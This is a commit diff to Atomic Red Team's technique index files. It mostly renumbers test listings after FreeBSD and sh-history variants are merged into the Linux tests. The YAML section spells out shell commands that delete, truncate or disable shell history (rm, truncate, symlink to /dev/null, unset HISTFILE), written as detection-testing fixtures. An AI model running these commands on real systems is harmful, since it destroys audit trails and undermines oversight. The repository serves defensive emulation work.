 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -184,24 +184,17 @@
 - T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
-  - Atomic Test #2: Clear sh history (rm) [linux]
-  - Atomic Test #3: Clear Bash history (echo) [linux]
-  - Atomic Test #4: Clear sh history (echo) [linux]
-  - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
-  - Atomic Test #6: Clear sh history (cat dev/null) [linux]
-  - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
-  - Atomic Test #8: Clear sh history (ln dev/null) [linux]
-  - Atomic Test #9: Clear Bash history (truncate) [linux]
-  - Atomic Test #10: Clear sh history (truncate) [linux]
-  - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
-  - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
-  - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
-  - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
-  - Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
-  - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
-  - Atomic Test #17: Prevent Powershell History Logging [windows]
-  - Atomic Test #18: Clear Powershell History by Deleting History File [windows]
-  - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
+  - Atomic Test #2: Clear Bash history (echo) [linux]
+  - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
+  - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
+  - Atomic Test #5: Clear Bash history (truncate) [linux]
+  - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
+  - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
+  - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
+  - Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
+  - Atomic Test #10: Prevent Powershell History Logging [windows]
+  - Atomic Test #11: Clear Powershell History by Deleting History File [windows]
+  - Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -715,9 +708,8 @@
   - Atomic Test #6: Delete a single file - Windows PowerShell [windows]
   - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
   - Atomic Test #8: Delete Filesystem - Linux [linux]
-  - Atomic Test #9: Delete Filesystem - FreeBSD [linux]
-  - Atomic Test #10: Delete Prefetch File [windows]
-  - Atomic Test #11: Delete TeamViewer Log Files [windows]
+  - Atomic Test #9: Delete Prefetch File [windows]
+  - Atomic Test #10: Delete TeamViewer Log Files [windows]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1221 Template Injection](../../T1221/T1221.md)
   - Atomic Test #1: WINWORD Remote Template Injection [windows]
@@ -797,11 +789,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -1187,11 +1178,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1324,14 +1314,10 @@
   - Atomic Test #7: What shells are available [linux]
   - Atomic Test #8: Command line scripts [linux]
   - Atomic Test #9: Obfuscated command line scripts [linux]
-  - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
-  - Atomic Test #11: Change login shell [linux]
-  - Atomic Test #12: Change login shell (freebsd) [linux]
-  - Atomic Test #13: Environment variable scripts [linux]
-  - Atomic Test #14: Environment variable scripts (freebsd) [linux]
-  - Atomic Test #15: Detecting pipe-to-shell [linux]
-  - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
-  - Atomic Test #17: Current kernel information enumeration [linux]
+  - Atomic Test #10: Change login shell [linux]
+  - Atomic Test #11: Environment variable scripts [linux]
+  - Atomic Test #12: Detecting pipe-to-shell [linux]
+  - Atomic Test #13: Current kernel information enumeration [linux]
 - [T1559 Inter-Process Communication](../../T1559/T1559.md)
   - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
   - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
@@ -1764,11 +1750,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1829,9 +1814,8 @@
 - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
   - Atomic Test #1: Psiphon [windows]
   - Atomic Test #2: Tor Proxy Usage - Windows [windows]
-  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
+  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu/FreeBSD [linux]
   - Atomic Test #4: Tor Proxy Usage - MacOS [macos]
-  - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
 - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1571 Non-Standard Port](../../T1571/T1571.md)
   - Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
@@ -1936,8 +1920,7 @@
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #1: Stage data from Discovery.bat [windows]
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-  - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
-  - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows]
+  - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
 - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
   - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
 - [T1119 Automated Collection](../../T1119/T1119.md)
@@ -2371,12 +2354,11 @@
   - Atomic Test #3: View accounts with UID 0 [linux, macos]
   - Atomic Test #4: List opened files by user [linux, macos]
   - Atomic Test #5: Show if a user account has ever logged in remotely [linux]
-  - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
-  - Atomic Test #7: Enumerate users and groups [linux, macos]
-  - Atomic Test #8: Enumerate users and groups [macos]
-  - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows]
-  - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows]
-  - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows]
+  - Atomic Test #6: Enumerate users and groups [linux, macos]
+  - Atomic Test #7: Enumerate users and groups [macos]
+  - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
+  - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
+  - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
@@ -2843,11 +2825,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -62,21 +62,14 @@
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
-  - Atomic Test #2: Clear sh history (rm) [linux]
-  - Atomic Test #3: Clear Bash history (echo) [linux]
-  - Atomic Test #4: Clear sh history (echo) [linux]
-  - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
-  - Atomic Test #6: Clear sh history (cat dev/null) [linux]
-  - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
-  - Atomic Test #8: Clear sh history (ln dev/null) [linux]
-  - Atomic Test #9: Clear Bash history (truncate) [linux]
-  - Atomic Test #10: Clear sh history (truncate) [linux]
-  - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
-  - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
-  - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
-  - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
-  - Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
-  - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
+  - Atomic Test #2: Clear Bash history (echo) [linux]
+  - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
+  - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
+  - Atomic Test #5: Clear Bash history (truncate) [linux]
+  - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
+  - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
+  - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
+  - Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #3: Base64 decoding with Python [linux, macos]
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -220,7 +213,6 @@
   - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
   - Atomic Test #3: Overwrite and delete a file with shred [linux]
   - Atomic Test #8: Delete Filesystem - Linux [linux]
-  - Atomic Test #9: Delete Filesystem - FreeBSD [linux]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
   - Atomic Test #1: Binary simply packed by UPX (linux) [linux]
@@ -237,11 +229,10 @@
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # persistence
@@ -342,11 +333,10 @@
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # command-and-control
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -381,8 +371,7 @@
 - T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
-  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
-  - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
+  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu/FreeBSD [linux]
 - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1571 Non-Standard Port](../../T1571/T1571.md)
   - Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
@@ -441,7 +430,6 @@
 - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-  - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
 - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1115 Clipboard Data](../../T1115/T1115.md)
   - Atomic Test #5: Add or copy content to clipboard with xClip [linux]
@@ -564,11 +552,10 @@
   - Atomic Test #2: At - Schedule a job [linux]
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -670,8 +657,7 @@
   - Atomic Test #3: View accounts with UID 0 [linux, macos]
   - Atomic Test #4: List opened files by user [linux, macos]
   - Atomic Test #5: Show if a user account has ever logged in remotely [linux]
-  - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
-  - Atomic Test #7: Enumerate users and groups [linux, macos]
+  - Atomic Test #6: Enumerate users and groups [linux, macos]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
@@ -782,14 +768,10 @@
   - Atomic Test #7: What shells are available [linux]
   - Atomic Test #8: Command line scripts [linux]
   - Atomic Test #9: Obfuscated command line scripts [linux]
-  - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
-  - Atomic Test #11: Change login shell [linux]
-  - Atomic Test #12: Change login shell (freebsd) [linux]
-  - Atomic Test #13: Environment variable scripts [linux]
-  - Atomic Test #14: Environment variable scripts (freebsd) [linux]
-  - Atomic Test #15: Detecting pipe-to-shell [linux]
-  - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
-  - Atomic Test #17: Current kernel information enumeration [linux]
+  - Atomic Test #10: Change login shell [linux]
+  - Atomic Test #11: Environment variable scripts [linux]
+  - Atomic Test #12: Detecting pipe-to-shell [linux]
+  - Atomic Test #13: Current kernel information enumeration [linux]
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -880,11 +862,10 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -56,11 +56,11 @@
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
-  - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
-  - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
-  - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
-  - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
-  - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
+  - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
+  - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
+  - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
+  - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
+  - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #3: Base64 decoding with Python [linux, macos]
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -574,8 +574,8 @@
   - Atomic Test #2: View sudoers access [linux, macos]
   - Atomic Test #3: View accounts with UID 0 [linux, macos]
   - Atomic Test #4: List opened files by user [linux, macos]
-  - Atomic Test #7: Enumerate users and groups [linux, macos]
-  - Atomic Test #8: Enumerate users and groups [macos]
+  - Atomic Test #6: Enumerate users and groups [linux, macos]
+  - Atomic Test #7: Enumerate users and groups [macos]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
 - T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -116,9 +116,9 @@
   - Atomic Test #1: Install and Register Password Filter DLL [windows]
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
-  - Atomic Test #17: Prevent Powershell History Logging [windows]
-  - Atomic Test #18: Clear Powershell History by Deleting History File [windows]
-  - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
+  - Atomic Test #10: Prevent Powershell History Logging [windows]
+  - Atomic Test #11: Clear Powershell History by Deleting History File [windows]
+  - Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -492,8 +492,8 @@
   - Atomic Test #5: Delete an entire folder - Windows cmd [windows]
   - Atomic Test #6: Delete a single file - Windows PowerShell [windows]
   - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
-  - Atomic Test #10: Delete Prefetch File [windows]
-  - Atomic Test #11: Delete TeamViewer Log Files [windows]
+  - Atomic Test #9: Delete Prefetch File [windows]
+  - Atomic Test #10: Delete TeamViewer Log Files [windows]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1221 Template Injection](../../T1221/T1221.md)
   - Atomic Test #1: WINWORD Remote Template Injection [windows]
@@ -1310,7 +1310,7 @@
 - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #1: Stage data from Discovery.bat [windows]
-  - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows]
+  - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
 - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
   - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
 - [T1119 Automated Collection](../../T1119/T1119.md)
@@ -1622,9 +1622,9 @@
   - Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows]
 - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
-  - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows]
-  - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows]
-  - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows]
+  - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
+  - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
+  - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
   - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]

atomics/Indexes/index.yaml

@@ -7506,23 +7506,16 @@ defense-evasion:
       description: 'Clears bash history via rm
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       - macos
       executor:
-        command: 'rm ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (rm)
-      auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100
-      description: 'Clears sh history via rm
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'rm ~/.sh_history
+        command: 'rm #{history_path}
 
           '
         name: sh
@@ -7531,22 +7524,15 @@ defense-evasion:
       description: 'Clears bash history via echo
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       executor:
-        command: 'echo "" > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (echo)
-      auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
-      description: 'Clears sh history via echo
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'echo "" > ~/.sh_history
+        command: 'echo "" > #{history_path}
 
           '
         name: sh
@@ -7558,20 +7544,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'cat /dev/null > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (cat dev/null)
-      auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
-      description: 'Clears sh history via cat /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'cat /dev/null > ~/.sh_history
+        command: 'cat /dev/null > #{history_path}
 
           '
         name: sh
@@ -7583,20 +7562,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'ln -sf /dev/null ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (ln dev/null)
-      auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd
-      description: 'Clears sh history via a symlink to /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'ln -sf /dev/null ~/.sh_history
+        command: 'ln -sf /dev/null #{history_path}
 
           '
         name: sh
@@ -7607,20 +7579,13 @@ defense-evasion:
         '
       supported_platforms:
       - linux
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'truncate -s0 ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (truncate)
-      auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818
-      description: 'Clears sh history via truncate
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'truncate -s0 ~/.sh_history
+        command: 'truncate -s0 #{history_path}
 
           '
         name: sh
@@ -7639,22 +7604,6 @@ defense-evasion:
           export HISTFILESIZE=0
           history -c
         name: sh
-    - name: Clear history of a bunch of shells (freebsd)
-      auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
-      description: 'Clears the history of a bunch of different shell types by setting
-        the history size to zero
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          unset HISTFILE
-          unset histfile
-          export HISTFILESIZE=0
-          export HISTSIZE=0
-          history -c
-        name: sh
     - name: Clear and Disable Bash History Logging
       auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
       description: 'Clears the history and disable bash history logging of the current
@@ -7705,41 +7654,15 @@ defense-evasion:
